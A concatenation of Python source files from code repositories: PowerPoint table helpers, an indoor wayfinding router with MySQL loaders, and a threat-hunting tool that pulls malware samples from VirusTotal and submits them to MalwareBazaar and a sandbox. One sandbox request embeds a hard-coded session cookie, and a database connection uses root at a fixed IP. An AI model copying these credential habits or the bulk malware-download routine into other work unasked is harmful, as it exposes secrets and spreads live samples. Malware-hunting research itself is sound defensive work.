return table
# construct table by given dataframe
@staticmethod
def add_table_by_df(slide, df, left = 0, top = 0):
shape = slide.shapes
left = Inches(left)
top = Inches(top)
width = height = Inches(1)
row = df.shape[0]
col = df.shape[1]
table = shape.add_table(row, col, left, top, width, height).table
for col in range(len(table.columns)):
for row in range(len(table.rows)):
table.cell(row, col).text = df.iloc[row, col]
return table
# format the column width and text size
@staticmethod
def resize_table(table, font_size):
# setting font size
for col in range(len(table.columns)):
for row in range(len(table.rows)):
for cell_pt in table.cell(row, col).text_frame.paragraphs:
cell_pt.font.size = font_size
# format the column by finding the max length run in paragraphs
list_col_max_width = [0 for x in range(len(table.columns))]
for col in range(len(table.columns)):
for row in range(len(table.rows)):
for paragraphs in table.cell(row, col).text_frame.paragraphs:
for run in paragraphs.runs:
list_col_max_width[col] = max(list_col_max_width[col], len(run.text)*(font_size))
# setting column width
for col in range(len(table.columns)):
table.columns[col].width = list_col_max_width[col] + Cm(0.25)
# set multiple column width with corresponding given value
@staticmethod
def set_column_width(table, list_col_idx, list_width):
for col in list_col_idx:
table.columns[col].width = list_width[col]
# set cell text alignment by table
@staticmethod
def set_table_alignment(table, horizen_type, vertical_type):
for row in range(len(table.rows)):
for col in range(len(table.columns)):
table.cell(row, col).vertical_anchor = vertical_type # set vertical alignment
for paragraph in table.cell(row, col).text_frame.paragraphs:
paragraph.alignment = horizen_type # set horizen alignment
# fill cell background
@staticmethod
def set_cell_fill(table, list_cell_coord, RGBcolor):
for row, col in list_cell_coord:
cell = table.cell(row, col)
fill = cell.fill
fill.solid()
fill.fore_color.rgb = RGBcolor
# fill table(all-cell) background
@staticmethod
def set_table_fill(table, RGBcolor):
for row in range(len(table.rows)):
for col in range(len(table.columns)):
cell = table.cell(row, col)
fill = cell.fill
fill.solid()
fill.fore_color.rgb = RGBcolor
# print table value
@staticmethod
def print_table(table):
for row in range(len(table.rows)):
for col in range(len(table.columns)):
print(table.cell(row, col).text_frame.text, end=" ")
print()
# new xml element to set style
@staticmethod
def SubElement(parent, tagname, **kwargs):
element = OxmlElement(tagname)
element.attrib.update(kwargs)
parent.append(element)
return element
# set border style by modifying xml
@classmethod
def set_table_border(cls, table, border_color="444444", border_width='12700'):
for row in range(len(table.rows)):
for col in range(len(table.columns)):
cell = table.cell(row, col)
tc = cell._tc # <class 'pptx.oxml.table.CT_TableCell'> as a xml element
tcPr = tc.get_or_add_tcPr() # <class 'pptx.oxml.table.CT_TableCellProperties'> as a xml element
for lines in ['a:lnL','a:lnR','a:lnT','a:lnB']:
ln = cls.SubElement(tcPr, lines, w=border_width, cap='flat', cmpd='sng', algn='ctr')
solidFill = cls.SubElement(ln, 'a:solidFill')
srgbClr = cls.SubElement(solidFill, 'a:srgbClr', val=border_color)
prstDash = cls.SubElement(ln, 'a:prstDash', val='solid')
round_ = cls.SubElement(ln, 'a:round')
headEnd = cls.SubElement(ln, 'a:headEnd', type='none', w='med', len='med')
tailEnd = cls.SubElement(ln, 'a:tailEnd', type='none', w='med', len='med')
# set dblstrike on run tag by xml
@classmethod
def set_dblstrike(cls, table, list_run_text):
for row in range(len(table.rows)):
for col in range(len(table.columns)):
for paragraphs in table.cell(row, col).text_frame.paragraphs:
for run in paragraphs.runs:
if run.text in list_run_text:
r = run._r
rPr = cls.SubElement(r, 'a:rPr', strike="dblStrike")
# find the rPr tag with dblStrike attrib under run, then return a list of quilfied run-text
@staticmethod
def find_dblstrike(table):
namespaces = {'a': 'http://schemas.openxmlformats.org/drawingml/2006/main'}
list_run_text = []
for row in range(len(table.rows)):
for col in range(len(table.columns)):
cell = table.cell(row, col)
tc = cell._tc
list_rPr = tc.findall('.//a:rPr[@strike="dblStrike"]', namespaces)
for rPr in list_rPr:
r = rPr.find('..')
t = r.find('.//a:t', namespaces)
list_run_text.append(t.text)
return list_run_text
# set table color that the srchClr val is not "000000"
@classmethod
def set_color(cls, table, dict_run_text):
for row in range(len(table.rows)):
for col in range(len(table.columns)):
for paragraphs in table.cell(row, col).text_frame.paragraphs:
for run in paragraphs.runs:
if run.text in dict_run_text.keys():
r = run._r
rPr = r.get_or_add_rPr()
solidFill = cls.SubElement(rPr, 'a:solidFill')
srgbClr = cls.SubElement(solidFill, 'a:srgbClr', val=dict_run_text[run.text])
# find the run's color that is not "000000" and return that color and text as dict
@staticmethod
def find_color(table):
namespaces = {'a': 'http://schemas.openxmlformats.org/drawingml/2006/main'}
dict_run_text = {}
for row in range(len(table.rows)):
for col in range(len(table.columns)):
for paragraphs in table.cell(row, col).text_frame.paragraphs:
for run in paragraphs.runs:
r = run._r
srgbClr = r.find('.//a:srgbClr', namespaces)
if srgbClr.attrib["val"] != "000000":
t = r.find('.//a:t', namespaces)
dict_run_text[t.text] = srgbClr.attrib["val"]
return dict_run_text
# copy table value by runs
@staticmethod
def copy_table_value(dst_table, src_table):
for row in range(len(src_table.rows)):
for col in range(len(src_table.columns)):
for paragraph in src_table.cell(row, col).text_frame.paragraphs:
dst_p = dst_table.cell(row, col).text_frame.add_paragraph()
for run in paragraph.runs:
dst_run = dst_p.add_run()
dst_run.text = run.text
# output a table's xml file
@classmethod
def print_table_xml(cls, table, table_name, path=os.getcwd()):
with open(table_name + "_table.xml", "w") as f:
f.write(str(table._tbl.xml))
``` |
{
"source": "a22057916w/WayFinder",
"score": 3
} |
#### File: py_src/Mysql/dumpJson.py
```python
import mysql.connector
import json
import re
from math import sin, cos, sqrt, atan2, radians
import sys
# Adding the path of self-def Library
sys.path.append("C:/Users/A02wxy/Documents/GitHub/WayFinder/Direction/Library/script/")
from featureCollection import Feature, Vertex
from readGeojson import readAllGeojson
def MYSQL_DUMP_JSON():
mydb = mysql.connector.connect(
host="192.168.127.12",
user="root",
database="WayFinder"
)
mycursor = mydb.cursor()
# read all geoJson data
geoSource = readAllGeojson()
for i in range(0, len(geoSource)):
floor = "sf_" + str(i + 1) + "f"
# initiating features from geoJson Data
floorData = geoSource[i]
floorFeatures = floorData["features"]
features = []
for feature in floorFeatures:
Afeature = Feature(feature)
features.append(Afeature)
# checking if table exists
sql_checkTable = "SHOW TABLES LIKE %s"
mycursor.execute(sql_checkTable, (floor, ))
result = mycursor.fetchone()
if result == None:
sql_create = "CREATE TABLE " + floor + "(type VARCHAR(255), id VARCHAR(255), name VARCHAR(255), multi_door int(255), door VARCHAR(255), vertex VARCHAR(255), vertex_id VARCHAR(255))"
mycursor.execute(sql_create)
else:
sql_delete = "DELETE FROM " + floor
mycursor.execute(sql_delete)
# Updating mysql data from features
sql = "INSERT INTO " + floor + "(type, id, name, multi_door, door, vertex, vertex_id) VALUES (%s, %s, %s, %s, %s, %s, %s)"
for feature in features:
type = feature.getType()
id = feature.getID()
name = feature.getName()
mutil_door = feature.getMutilDoors()
door = str(feature.getDoor())
vertex = str(feature.getVertex())
vertex_id = str(feature.getVertexID())
val = (type, id, name, mutil_door, door, vertex, vertex_id)
mycursor.execute(sql, val)
mydb.commit()
mydb.close()
MYSQL_DUMP_JSON()
```
#### File: py_src/Mysql/dumpPoster.py
```python
import mysql.connector
import json
import re
import pandas as pd
import pymysql
from sqlalchemy import create_engine
import sys
# Adding the path of self-def Library
sys.path.append("C:/Users/A02wxy/Documents/GitHub/WayFinder/Direction/Library/script/")
from featureCollection import Feature, Vertex
from myio import read_excel
from mysqlCoon import MY_ENGINE
def MYSQL_DUMP_POSTER():
# ====== Connection ====== #
# Connecting to mysql by providing a sqlachemy engine
engine = MY_ENGINE()
# dump dist excel to mysql
floorNumber = 9
for i in range(0, 9):
fileName = "C:\\Users\\A02wxy\\Documents\\GitHub\\WayFinder\\Direction\\Route\\poster\\sf" + str(i + 1) + "f_poster.xlsx"
tableName = "sf" + str(i + 1) + "f_poster"
df = read_excel(fileName)
df.to_sql(name = tableName, if_exists="replace", con = engine, index = False)
MYSQL_DUMP_POSTER()
```
#### File: WayFinder/py_src/route.py
```python
import mapbox
import json
from math import sin, cos, sqrt, atan2, radians
import sys
# Adding the path of self-def Library
sys.path.append("C:/Users/A02wxy/Documents/GitHub/WayFinder/Direction/Library/script/")
from featureCollection import Feature, Vertex, Poster
from readGeojson import readAllGeojson
from weight import getWeight
from myio import save
# all pairs shortest path alogrithm
def Floyd_Warshall(weight):
w = weight # 一張有權重的圖
n = len(w[0]) # w[n][n]
d = [[0 for i in range(n)] for j in range(n)] # 最短路徑長度
next = [[0 for i in range(n)] for j in range(n)] # 由i點到j點的路徑,第二點為next[i][j]
for i in range(0, n):
for j in range(0, n):
d[i][j] = w[i][j]
next[i][j] = j
for i in range(0, n):
d[i][i] = 0
for k in range(0, n): # 嘗試每一個中繼點
for i in range(0, n): # 計算每一個i點與每一個j點
for j in range(0, n):
if d[i][k] + d[k][j] < d[i][j]:
d[i][j] = d[i][k] + d[k][j]
# 由i點到j點的路徑的第二點,
# 正是由i點到k點的路徑的第二點。
next[i][j] = next[i][k];
totNext = [[None for i in range(n)] for j in range(n)]
for i in range(0, n):
for j in range(0, n):
totNext[i][j] = find_path(i, j, next)
return d, next, totNext
# 印出由s點到t點的最短路徑
def find_path(s, t, next):
middle = []
i = s
while i != t:
i = next[i][t]
middle.append(i)
return middle
def getRoute(collection, targetCollection):
# assigning the variables
dist = collection["dist"]
targetDist = targetCollection["dist"]
sn = len(dist[0])
tn = len(targetDist[0])
n = max(sn, tn)
route = [[1E9 for i in range(n)] for j in range(n)]
EID = [[None for i in range(n)] for j in range(n)] # record which elevator it takes
for i in range(0, sn):
for j in range(0, tn):
route[i][j], EID[i][j] = getDistanceAndElevator(collection, targetCollection, i, j)
return route, EID
def getDistanceAndElevator(collection, targetCollection, s, e):
# assigning the variables
dist = collection["dist"]
elevators = collection["elevators"]
vertexes = collection["vertexes"]
targetDist = targetCollection["dist"]
targetElevators = targetCollection["elevators"]
targetVertex = targetCollection["vertexes"]
# create a hashmap<string, integer>(<VID, index>)
EVID = {}
for elevator in elevators:
VID = elevator.getVertexID()[0]
for vertex in vertexes:
if vertex.getID() == VID:
EVID[VID] = vertex.getIndex()
break
TEVID = {}
for elevator in targetElevators:
TVID = elevator.getVertexID()[0]
for vertex in targetVertex:
if vertex.getID() == TVID:
TEVID[TVID] = vertex.getIndex()
break
# calculating the route across floors
spe = 1E9 # starting point to elevator
tpe = 1E9 # target point to elevator
totDist = 1E9
EID = None # record the elevator's id
for elevator in elevators:
VID = elevator.getVertexID()[0]
spe = dist[s][EVID[VID]]
EID = elevator.getID()
# find the same elevator on different floor
for targetElevator in targetElevators:
if targetElevator.getName() == elevator.getName():
TVID = targetElevator.getVertexID()[0]
tpe = targetDist[e][TEVID[TVID]]
if totDist > spe + tpe:
totDist = spe + tpe
EID = targetElevator.getID()
break
else:
continue
return totDist, EID
def parseSave(totDist, totElev, floorVertex, floorNext, floorRouteCoord, floorRouteRot):
floorNumber = len(totDist) # len(totDist) gets floor counts
# parse and save each floor as a file for dist and next
"""for i in range(0, floorNumber):
fileDist = "C:/Users/A02wxy/Documents/GitHub/WayFinder/Direction/Route/dist/sf" + str(i + 1) + "f_dist"
dist = [] # for saving dist to each floor from floor[i]
# parsing the dist data
for j in range(0, floorNumber):
for k in range(0, len(totDist[i][j])):
for l in range(0, len(totDist[i][j][k])):
dist.append({
"floor": str(j),
"start": str(k),
"dest": str(l),
"dist": totDist[i][j][k][l],
"Elevator": totElev[i][j][k][l]
})
save(dist, fileDist) # saving using myio function
# parsing the next(middle points) data and save
for i in range(0, floorNumber):
fileNext = "C:/Users/A02wxy/Documents/GitHub/WayFinder/Direction/Route/next/sf" + str(i + 1) + "f_next"
middle = [] # for saving middle points between the route only on floor[i]
for j in range(0, len(floorNext[i])):
for k in range(0, len(floorNext[i][j])):
middle.append({
"start": str(j),
"dest": str(k),
"next": floorNext[i][j][k],
"coordinate": floorRouteCoord[i][j][k],
"rotation": floorRouteRot[i][j][k]
})
save(middle, fileNext) # saving using myio function
#store each floor's vertexes
for i in range(0, floorNumber):
fileName = "C:/Users/A02wxy/Documents/GitHub/WayFinder/Direction/Route/vertex/sf" + str(i + 1) + "f_vertex"
vertexes = []
for vertex in floorVertex[i]:
vertexes.append({
"ID": vertex.getID(),
"_index_": vertex.getIndex(),
"inct": vertex.getInct(),
"coordinate": vertex.getCoordinate(),
"rotation": vertex.getRotation()
})
save(vertexes, fileName)"""
# store each floor's poster
for i in range(0, floorNumber):
fileName = "C:/Users/A02wxy/Documents/GitHub/WayFinder/Direction/Route/poster/sf" + str(i + 1) + "f_poster"
posters = []
for poster in floorPoster[i]:
posters.append({
"ID": poster.getID(),
"coordinate": poster.getCoordinate(),
"vertex_id": poster.getVertexID(),
"rotation": poster.getRotation()
})
save(posters, fileName)
if __name__ == "__main__":
geoSource = readAllGeojson()
floorNumber = len(geoSource)
# initializing each floor's data
floorData = []
for i in range(0, floorNumber):
floorData.append(geoSource[i])
# initializing each floor's feature with two dim list
floorFeatures = []
for i in range(0, floorNumber):
features = []
for feature in floorData[i]["features"]:
features.append(Feature(feature))
floorFeatures.append(features)
# initializing each floor's vertexes
floorVertex = []
for i in range(0, floorNumber):
index = 0
vertex = []
for feature in floorFeatures[i]:
if feature.getType() == "point":
vertex.append(Vertex(feature.getFeature(), index))
index += 1
floorVertex.append(vertex)
# initializing each floor's elevators
floorElevators = []
for i in range(0, floorNumber):
elevator = []
for feature in floorFeatures[i]:
if feature.getType() == "elevator":
elevator.append(Feature(feature.getFeature()))
floorElevators.append(elevator)
# initializing each floor's poster
floorPoster = []
for i in range(0, floorNumber):
poster = []
for feature in floorFeatures[i]:
if feature.getType() == "poster":
poster.append(Poster(feature.getFeature()))
floorPoster.append(poster)
# calculating each floor's route
totalWeight = getWeight(floorVertex) # return a list of weight (index represent floor)
floorDist = []
floorNext = []
totalNext = []
for i in range(0, len(totalWeight)):
d, n , tn = Floyd_Warshall(totalWeight[i]) # return two list of two dim
floorDist.append(d)
floorNext.append(n)
totalNext.append(tn)
# store all the data of each floor
floorCollection = []
for i in range(0, floorNumber):
floorCollection.append({
"features": floorFeatures[i],
"vertexes": floorVertex[i],
"elevators": floorElevators[i],
"dist": floorDist[i],
"next": floorNext[i]
})
# calculating the route and other information for all floor
totalRoute = [] # a four dim list [startFloor][targetFloor][startPoint][endPoint]
totalElevator = [] # a four dim list to record the elevator between two points
for i in range(0, floorNumber):
routes = []
EIDS = []
for j in range(0, floorNumber):
if i == j:
routes.append(floorDist[i])
# n for numbers of vertex of each floor
n = len(floorVertex[i])
EIDS.append([[None for i in range(n)] for j in range(n)])
continue
route, EID = getRoute(floorCollection[i], floorCollection[j])
routes.append(route)
EIDS.append(EID)
totalRoute.append(routes)
totalElevator.append(EIDS)
# change a list of index number into a list of coordinate
totalRouteCoord = []
for i in range(0, floorNumber):
floorRouteCoord = []
for j in range(0, len(totalNext[i])):
routeCoord = []
for k in range(0, len(totalNext[i][j])):
coords = []
for vertex_index in totalNext[i][j][k]:
coords.append(floorVertex[i][vertex_index].getCoordinate())
routeCoord.append(coords)
floorRouteCoord.append(routeCoord)
totalRouteCoord.append(floorRouteCoord)
totalRouteRot = []
for i in range(0, floorNumber):
floorRouteRot = []
for j in range(0, len(totalNext[i])):
routeRot = []
for k in range(0, len(totalNext[i][j])):
rotation = []
for vertex_index in totalNext[i][j][k]:
rotation.append(floorVertex[i][vertex_index].getRotation())
routeRot.append(rotation)
floorRouteRot.append(routeRot)
totalRouteRot.append(floorRouteRot)
parseSave(totalRoute, totalElevator, floorVertex, totalNext, totalRouteCoord, totalRouteRot)
``` |
{
"source": "a232319779/hihunter",
"score": 3
} |
#### File: hihunter/common/json2tree.py
```python
from io import StringIO
_branch_extend = '│ '
_branch_mid = '├─ '
_branch_last = '└─ '
_spacing = ' '
lang_map = {
'process': '启动',
'behavior': '操作',
'drop': '释放',
'net': '连接'
}
def _getHierarchy(graph, name='', file=None, _prefix='', _last=True):
""" Recursively parse json data to print data types """
if isinstance(graph, dict):
op_type = graph.get('type', '')
if op_type:
name = lang_map.get(op_type, op_type) + ' ' + graph.get('name')
print(_prefix, _branch_last if _last else _branch_mid, \
name, sep="", file=file)
_prefix += _spacing if _last else _branch_extend
length = len(graph)
for i, key in enumerate(graph.keys()):
_last = i == (length - 1)
_getHierarchy(graph[key], '"' + key + '"', file, _prefix, _last)
elif isinstance(graph, list):
for each_json in graph:
_getHierarchy(each_json, '', file, _prefix, _last=True)
else:
pass
def graph2tree(graph):
messageFile = StringIO()
_getHierarchy(graph, file=messageFile)
message = messageFile.getvalue()
messageFile.close()
return message
```
#### File: hihunter/reddripsandbox/reddripsandbox.py
```python
import os
import json
import requests
from hihunter.common.common import *
from hihunter.common.json2tree import graph2tree
class ReddripSandbox(object):
def __init__(self, api_key):
self.api_key = api_key
def upload(self, file_name):
"""
{
"data": {
"filename": "118cfee735fbdcf08801ff2c1ca850c2",
"id": [
"AX6uN15jCf0-QUp-cYQr"
],
"md5": "118cfee735fbdcf08801ff2c1ca850c2",
"sha1": "e8d92b83a04122d73cb8aabe1c107034b59875a4"
},
"msg": "ok",
"status": 10000
}
"""
try:
url = "https://sandbox.ti.qianxin.com/sandbox/api/v1/token/{token}/submit/file".format(token=self.api_key)
file_payload = open(file_name, 'rb').read()
base_name = os.path.basename(file_name)
response = requests.request("POST", url, files={'file':(base_name, file_payload)})
res_js = response.json()
if res_js.get('status', 0) == 10000:
sandbox_data = res_js.get('data', {})
return return_data(10000, 'upload success', sandbox_data)
return return_data(30003, 'upload failed', res_js)
except Exception as e:
return return_data(30002, str(e), {})
def __parse_report__(self, report_json):
cut_report_json = dict()
dynamic_detect = report_json.get('dynamic_detect', {})
graph = dynamic_detect.get('host_behavior', {}).get('graph', {})
graph_tree = graph2tree(graph)
network_behavior = dynamic_detect.get('network_behavior', {})
dns = network_behavior.get('dns', {})
domains = list()
if dns.get('total', 0) > 0:
datas = dns.get('data', [])
for data in datas:
domains.append(data.get('request', ''))
session = network_behavior.get('session', {})
hosts = list()
if session.get('total', 0) > 0:
datas = session.get('data', [])
for data in datas:
hosts.append(data.get('ip', ''))
http = network_behavior.get('http', {})
urls = list()
if http.get('total', 0) > 0:
datas = http.get('data', [])
for data in datas:
urls.append(data.get('url'))
ti = dynamic_detect.get('threat_analyze', {}).get('ti', {})
ti_tags = list()
if ti.get('total', 0) > 0:
datas = ti.get('data', [])
for data in datas:
ti_tags.append(data.get('malicious_type', []))
ti_tags.extend(data.get('family', []))
web_url = report_json.get('web_url', '')
task_id = ''
if web_url:
task_id = web_url.split('=')[-1]
basic_info = dynamic_detect.get('static_analyze', {}).get('basic_info', {})
cut_report_json['md5'] = basic_info.get('md5')
cut_report_json['sha1'] = basic_info.get('sha1')
cut_report_json['score'] = basic_info.get('score')
ti_tags.extend(basic_info.get('file_tags', []))
cut_report_json['graph'] = graph_tree
domains = list(set(domains))
hosts = list(set(hosts))
urls = list(set(urls))
ti_tags = list(set(ti_tags))
cut_report_json['has_network'] = len(domains) + len(hosts) + len(urls)
cut_report_json['domains'] = ','.join(domains)
cut_report_json['hosts'] = ','.join(hosts)
cut_report_json['urls'] = ','.join(urls)
cut_report_json['ti_tags'] = ','.join(ti_tags)
cut_report_json['task_id'] = task_id
return cut_report_json
def report(self, report_id):
"""
{
"data": {
"AX6uP6TPCf0-QUp-cYo0": {
"condition": 2,
"desc": "no report",
"dynamic_detect": {},
"static_detect": {},
"web_url": ""
}
},
"msg": "ok",
"status": 10000
}
"""
try:
url = "https://sandbox.ti.qianxin.com/sandbox/api/v1/token/{token}/report".format(token=self.api_key)
payload = [
{
"type": "file",
"value": report_id
}
]
headers = {
'content-type': "application/json",
'charset': "utf-8"
}
response = requests.request("POST", url, data=json.dumps(payload), headers=headers)
res_js = response.json()
if res_js.get('data', {}).get(report_id, {}).get('condition', -1) == 2:
return return_data(30004, 'no report', res_js)
else:
parse_data = self.__parse_report__(res_js.get('data', {}).get(report_id, {}))
return return_data(10000, 'report success', parse_data)
except Exception as e:
return return_data(30001, str(e), {})
def screen_shot(self, report_id):
"""
{
"data": {
"data": []
'xxxx'
],
"msg": "ok",
"status": 10000
}
"""
try:
url = "https://sandbox.ti.qianxin.com/sandbox/report/dynamic/get/screenshot/file/{report_id}".format(report_id=report_id)
headers = {
'Accept-Encoding': 'gzip, deflate, br',
'Referer': 'https://sandbox.ti.qianxin.com/sandbox/page/detail?type=file&id={report_id}'.format(report_id=report_id),
'Host': 'sandbox.ti.qianxin.com',
'Cookie': 'lang=chinese; session=2e9aac64-2b28-4b1e-b61f-0ecd57e03046'
}
response = requests.request("GET", url, headers=headers)
data = response.json().get('data', [])
data_len = len(data)
pic = ''
if data_len > 0:
choose_num = int(data_len / 2) + int(data_len / 4)
pic = data[choose_num]
return return_data(10000, 'report success', pic)
except Exception as e:
return return_data(30001, str(e), {})
```
#### File: hihunter/hihunter/run.py
```python
import os
import argparse
import json
import time
from urllib.parse import quote
from hihunter.virustotal.virustotal import VirusTotal
from hihunter.malwarebazaar.malwarebazaar import MalwareBazaar
from hihunter.reddripsandbox.reddripsandbox import ReddripSandbox
from hihunter.common.postgre_db import HiHunterDB, HiHunterRSDatas
from hihunter.common.common import parse_config
config_help = 'config path. default value: ./hihunter_config.json'
dir_help = 'sample path. default value: ./files'
number_help = 'process number. default value: 10'
def run_vt_filter():
try:
epilog = "Use like: hihunter-vt-filter -c $config"
parser = argparse.ArgumentParser(prog='HiHunter virustotal data filter tool.',
description='Version 0.0.1',
epilog=epilog,
formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument('-c', '--config', help=config_help,
type=str, dest='config_file', action='store', default='./hihunter_config.json')
parser.add_argument('-n', '--number', help=number_help,
type=int, dest='number', action='store', default=10)
args = parser.parse_args()
except Exception as e:
print('error: %s' % str(e))
exit(0)
vt_filter_config = parse_config(args.config_file)
vt = VirusTotal(api_key=vt_filter_config.get('api_key'))
quota_data = vt.api_key_statics()
print(json.dumps(quota_data, indent=4))
utc_time_end = int(time.time())
delay = vt_filter_config.get('delay', 0)
utc_time_start = utc_time_end - 3600 * 8 - 3600 * delay
querys = []
for query in vt_filter_config.get('querys', []):
querys.append('{0} fs:{1}+ fs:{2}-'.format(query, utc_time_start, utc_time_end))
hhd = HiHunterDB(vt_filter_config)
hhd.contected()
limit = args.number
for query in querys:
query = quote(query)
filter_data = vt.filter(query=query, limit=limit)
sample_datas = filter_data.get('data', {}).get('data', [])
print(json.dumps(sample_datas, indent=4))
hhd.add_vt_data(sample_datas)
# close session
hhd.close()
def run_vt_usage():
try:
epilog = "Use like: hihunter-vt-usage -c $config"
parser = argparse.ArgumentParser(prog='Virustotal api usage statics.',
description='Version 0.0.1',
epilog=epilog,
formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument('-c', '--config', help=config_help,
type=str, dest='config_file', action='store', default='./hihunter_config.json')
args = parser.parse_args()
except Exception as e:
print('error: %s' % str(e))
exit(0)
vt_filter_config = parse_config(args.config_file)
vt = VirusTotal(api_key=vt_filter_config.get('api_key'))
quota_data = vt.api_key_statics()
print(json.dumps(quota_data, indent=4))
def run_create_table():
try:
epilog = "Use like: hihunter-create-pg-table -c $config"
parser = argparse.ArgumentParser(prog='Create postgre db tables.',
description='Version 0.0.1',
epilog=epilog,
formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument('-c', '--config', help=config_help,
type=str, dest='config_file', action='store', default='./hihunter_config.json')
args = parser.parse_args()
except Exception as e:
print('error: %s' % str(e))
exit(0)
vt_filter_config = parse_config(args.config_file)
hhd = HiHunterDB(vt_filter_config)
hhd.contected()
hhd.create_table()
# close session
hhd.close()
def run_vt_download():
try:
epilog = "Use like: hihunter-vt-download -c $config -d $save_path -k $hash"
parser = argparse.ArgumentParser(prog='Virustotal sample download tool.',
description='Version 0.0.1',
epilog=epilog,
formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument('-c', '--config', help=config_help,
type=str, dest='config_file', action='store', default='./hihunter_config.json')
parser.add_argument('-d', '--dir', help=dir_help,
type=str, dest='save_path', action='store', default='./files')
parser.add_argument('-k', '--key', help='download sample hash',
type=str, dest='key', action='store', default=None)
args = parser.parse_args()
except Exception as e:
print('error: %s' % str(e))
exit(0)
vt_filter_config = parse_config(args.config_file)
vt = VirusTotal(api_key=vt_filter_config.get('api_key'))
quota_data = vt.api_key_statics()
print(json.dumps(quota_data, indent=4))
download_path = args.save_path
file_sha1 = args.key
download_data = vt.download(file_sha1, download_path=download_path)
print(json.dumps(download_data, indent=4))
def run_mb_upload():
try:
epilog = "Use like: hihunter-mb-upload -c $config -d $save_path"
parser = argparse.ArgumentParser(prog='MalwareBazaar sample upload tool.',
description='Version 0.0.1',
epilog=epilog,
formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument('-c', '--config', help=config_help,
type=str, dest='config_file', action='store', default='./hihunter_config.json')
parser.add_argument('-d', '--dir', help=dir_help,
type=str, dest='save_path', action='store', default='./files')
parser.add_argument('-t', '--type', help='upload sample type, default value: "MS Word Document", support type: ["MS Word Document","Office Open XML Document","Email","Windows shortcut"]',
type=str, dest='file_type', action='store', default='MS Word Document')
parser.add_argument('-n', '--number', help=number_help,
type=int, dest='number', action='store', default=10)
args = parser.parse_args()
except Exception as e:
print('error: %s' % str(e))
exit(0)
vt_filter_config = parse_config(args.config_file)
vt = VirusTotal(api_key=vt_filter_config.get('api_key'))
quota_data = vt.api_key_statics()
print(json.dumps(quota_data, indent=4))
hhd = HiHunterDB(vt_filter_config)
hhd.contected()
mb = MalwareBazaar(api_key=vt_filter_config.get('mb_api_key'))
download_path = args.save_path
file_type = args.file_type
download_limit = args.number
file_sha1s = hhd.get_mb_sha1s(file_type, download_limit)
for file_sha1 in file_sha1s:
if file_sha1:
download_data = vt.download(file_sha1, download_path=download_path)
print(json.dumps(download_data, indent=4))
file_path = os.path.join(download_path, file_sha1)
upload_data = mb.upload(file_path)
print(json.dumps(upload_data, indent=4))
hhd.update_vt_by_sha1(file_sha1)
# close session
hhd.close()
def run_rs_upload():
try:
epilog = "Use like: hihunter-rs-upload -c $config -d $save_path"
parser = argparse.ArgumentParser(prog='Reddrip sandbox sample upload tool.',
description='Version 0.0.1',
epilog=epilog,
formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument('-c', '--config', help=config_help,
type=str, dest='config_file', action='store', default='./hihunter_config.json')
parser.add_argument('-d', '--dir', help=dir_help,
type=str, dest='save_path', action='store', default='./files')
parser.add_argument('-n', '--number', help=number_help,
type=int, dest='number', action='store', default=10)
args = parser.parse_args()
except Exception as e:
print('error: %s' % str(e))
exit(0)
vt_filter_config = parse_config(args.config_file)
hhd = HiHunterDB(vt_filter_config)
hhd.contected()
all_submit_sha1s = hhd.get_all_sha1s(HiHunterRSDatas)
upload_path = args.save_path
upload_number = args.number
sandbox_api_key = vt_filter_config.get('sandbox_api_key', '')
rs = ReddripSandbox(api_key=sandbox_api_key)
upload_datas = list()
count = 0
for file_name in os.listdir(upload_path):
# 提交过的就不在提交
if file_name in all_submit_sha1s:
continue
upload_data = dict()
file_full_path = os.path.join(upload_path, file_name)
return_data = rs.upload(file_full_path)
res_data = return_data.get('data', {})
upload_data['md5'] = res_data.get('md5', '')
upload_data['sha1'] = res_data.get('sha1', '')
upload_data['serial_id'] = res_data.get('id', [''])[0]
upload_data['sandbox_status'] = 0
print(json.dumps(upload_data, indent=4, ensure_ascii=False))
upload_datas.append(upload_data)
count += 1
if count >= upload_number:
break
hhd.add_rs_data(upload_datas)
# close session
hhd.close()
def run_rs_update():
try:
epilog = "Use like: hihunter-rs-upload -c $config"
parser = argparse.ArgumentParser(prog='Reddrip sandbox sample update tool.',
description='Version 0.0.1',
epilog=epilog,
formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument('-c', '--config', help=config_help,
type=str, dest='config_file', action='store', default='./hihunter_config.json')
parser.add_argument('-n', '--number', help=number_help,
type=int, dest='number', action='store', default=10)
args = parser.parse_args()
except Exception as e:
print('error: %s' % str(e))
exit(0)
vt_filter_config = parse_config(args.config_file)
hhd = HiHunterDB(vt_filter_config)
hhd.contected()
sandbox_api_key = vt_filter_config.get('sandbox_api_key', '')
rs = ReddripSandbox(api_key=sandbox_api_key)
rs_update_limit = args.number
serial_ids = hhd.get_rs_serial_id(0, rs_update_limit)
for serial_id in serial_ids:
return_data = rs.report(serial_id)
report_data = return_data.get('data', {})
print(18 * '-' + serial_id + 18 * '-')
print(report_data.get('graph'))
if return_data.get('status', -1) == 10000:
hhd.update_rs_by_serial_id(report_data, serial_id)
# close session
hhd.close()
def run_rs_download_screenshot():
try:
epilog = "Use like: hihunter-rs-download-screenshot -c $config"
parser = argparse.ArgumentParser(prog='Reddrip sandbox sample screenshot download tool.',
description='Version 0.0.1',
epilog=epilog,
formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument('-c', '--config', help=config_help,
type=str, dest='config_file', action='store', default='./hihunter_config.json')
parser.add_argument('-d', '--dir', help='save screenshot path. default value: ./hihunter_screenshot',
type=str, dest='save_path', action='store', default='./hihunter_screenshot')
parser.add_argument('-n', '--number', help=number_help,
type=int, dest='number', action='store', default=10)
args = parser.parse_args()
except Exception as e:
print('error: %s' % str(e))
exit(0)
vt_filter_config = parse_config(args.config_file)
hhd = HiHunterDB(vt_filter_config)
hhd.contected()
sandbox_api_key = vt_filter_config.get('sandbox_api_key', '')
rs = ReddripSandbox(api_key=sandbox_api_key)
rs_update_limit = args.number
screen_shot_path = args.save_path
serial_ids = hhd.get_rs_serial_id(1, rs_update_limit)
for serial_id in serial_ids:
screen_data = rs.screen_shot(serial_id)
pic_data = screen_data.get('data', '')
if pic_data:
screen_shot_name = '{}.jpg'.format(serial_id)
down_screen_shot_path = os.path.join(screen_shot_path, screen_shot_name)
